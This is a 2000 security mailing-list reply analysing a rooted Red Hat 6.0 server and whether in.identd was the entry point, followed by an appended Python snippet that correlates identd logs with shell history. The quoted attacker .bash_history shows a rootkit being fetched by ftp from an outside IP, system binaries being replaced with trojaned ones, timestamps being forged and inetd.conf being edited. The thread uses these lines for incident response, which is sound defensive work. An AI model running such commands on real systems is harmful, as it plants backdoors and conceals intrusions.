Subject: Re: Rooted through in.identd on Red Hat 6.0
From: jms (sec at ORGONE.NEGATION.NET)
Date: Thu Apr 20 2000 - 02:31:46 CDT
- Next message: Dmitry Alyabyev: "Re: Rooted through in.identd on Red Hat 6.0"
- Previous message: Bryan Seitz: "Re: CGI scans from Strauss.udel.edu -- They're back"
- Next in thread: Dmitry Alyabyev: "Re: Rooted through in.identd on Red Hat 6.0"
- Maybe reply: jms: "Re: Rooted through in.identd on Red Hat 6.0"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
What other services were running?
I'm more inclined to think they gained entry through other means, trojaned
the box, then came in again to clean up the logs and forgot to nuke
the .bash_history.
The in.identd entries are explained by his ftp session, which was probably
to get the rootkit:
ftp 200.192.58.201 21 <-- from .bash_history
^^^^^^^^^^^^^^
Apr 8 23:15:57 home identd[12006]: Connection from 200.192.58.201
^^^^^^^^^^^^^^
...from syslogs.
Supply a list of daemons running at the time of the break-in; I suspect we
will see something known to be rootable.
-jason storm
jms
negation.net
/* hard work never killed nobody,
but i aint takin no chances. */
> Hi,
>
> A client was hacked last week by what looked like a buffer
> overflow through in.identd. This was on a Red Hat 6.0
> box.
>
> RH don't have any current security notices or fixes for
> in.identd on their servers, and I haven't seen other
> boxes hacked through in.identd recently.
>
> The hacker left the usual trace in /.bash_history, which
> ran like:
>
> mkdir /usr/lib/... ; cd /usr/lib/...
> ftp 200.192.58.201 21
> cd /usr/lib/...
> mv netstat.gz? netstat.gz; mv ps.gz? ps.gz; mv pstree.gz? pstree.gz;
> mv pt07.gz? pt07.gz; mv slice2.gz? slice2.gz; mv syslogd.gz? syslogd.gz;
> mv tcpd.gz? tcpd.gz
> gzip -d *
> chmod +x *
> mv netstat /bin ; mv ps /bin ; mv tcpd /usr/sbin/; mv syslogd /usr/sbin;
> mv pt07 /usr/lib/; mv pstree /usr/bin ;
> /usr/lib/pt07
> echo "2 sh" >> /dev/cui220 ; echo "2 slice2" >> /dev/cui220 ;
> echo "2 bnc" >> /dev/220 ; echo "4 6667" >> /dev/cui221 ;
> echo "3 15678" >> /dev/cui221 ; echo "2 pt07" >> /dev/cui220 ;
> echo "3 1679" >> /dev/cui221; echo "3 5454" >> /dev/cui221;
> touch -t 199910122110 /dev/cui220
> touch -t 199910122110 /dev/cui221
> touch -t 199910122110 /usr/lib/pt07
> touch -t 199910122110 /usr/sbin/syslogd
> touch -t 199910122110 /usr/sbin/tcpd
> touch -t 199910122110 /bin/ps
> touch -t 199910122110 /bin/netstat
> touch -t 199910122110 /usr/bin/pstree
> cat /etc/inetd.conf | grep -v 15678 >> /tmp/b
> mv /tmp/b /etc/inetd.conf
> killall -HUP inetd
>
> ... installing a back door and a partial cover of tracks.
>
> The only messages in /var/log/messages around the time
> were:
>
> Apr 8 23:15:57 home identd[12006]: Connection from 200.192.58.201
> Apr 8 23:15:57 home identd[12006]: from: 200.192.58.201 ( 200.192.58.201 ) for: 1176, 21
> Apr 8 23:16:05 home identd[12007]: Connection from 200.192.58.201
> Apr 8 23:16:05 home identd[12007]: from: 200.192.58.201 ( 200.192.58.201 ) for: 1176, 21
>
> ... the IP address traces back to somewhere in Brazil.
>
> Anyone know of any current bug notices, exploits, or
> patches for in.identd?
>
> Del
>
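One way to check jms's reading of the identd entries, namely that they are ident lookups triggered by the victim's own outbound ftp session rather than inbound attack traffic, as an added example that is not part of the original thread. It assumes the pidentd log format quoted above and the RFC 1413 port order (port on the queried host first, port on the querying host second); the sample log and history lines are constructed from the excerpts in this thread.

```python
import re

# Constructed sample input, taken from the excerpts quoted in this thread.
IDENTD_LOG = """\
Apr 8 23:15:57 home identd[12006]: Connection from 200.192.58.201
Apr 8 23:15:57 home identd[12006]: from: 200.192.58.201 ( 200.192.58.201 ) for: 1176, 21
Apr 8 23:16:05 home identd[12007]: Connection from 200.192.58.201
Apr 8 23:16:05 home identd[12007]: from: 200.192.58.201 ( 200.192.58.201 ) for: 1176, 21
"""

BASH_HISTORY = """\
mkdir /usr/lib/... ; cd /usr/lib/...
ftp 200.192.58.201 21
cd /usr/lib/...
"""

# "for: A, B" in pidentd's log is the RFC 1413 query: A is the port on the host
# running identd (our box), B is the port on the host that asked.
IDENT_RE = re.compile(r"identd\[\d+\]: from: (\S+) \( \S+ \) for: (\d+), (\d+)")
FTP_RE = re.compile(r"^\s*ftp\s+(\S+)(?:\s+(\d+))?")


def ident_queries(log):
    """Return (querying_host, local_port, remote_port) for each ident lookup."""
    return [(m.group(1), int(m.group(2)), int(m.group(3)))
            for m in map(IDENT_RE.search, log.splitlines()) if m]


def outbound_ftp(history):
    """Return (host, port) for every ftp command found in a shell history.
    A missing port argument means the ftp default, 21."""
    hits = []
    for line in history.splitlines():
        m = FTP_RE.match(line)
        if m:
            hits.append((m.group(1), int(m.group(2) or 21)))
    return hits


def explain_ident_entries(log, history):
    """Pair each ident lookup with the outbound session that would have caused it.
    A lookup is 'outbound ftp' when the querying host and its port match an ftp
    command in the history; anything else is left 'unexplained' for follow-up."""
    sessions = set(outbound_ftp(history))
    report = []
    for host, local_port, remote_port in ident_queries(log):
        verdict = "outbound ftp" if (host, remote_port) in sessions else "unexplained"
        report.append(((host, local_port, remote_port), verdict))
    return report
```

Running it on the thread's excerpts marks both identd lookups as the server-side ident check of the victim's own `ftp 200.192.58.201 21` session; the same check on a history without that ftp command leaves them unexplained.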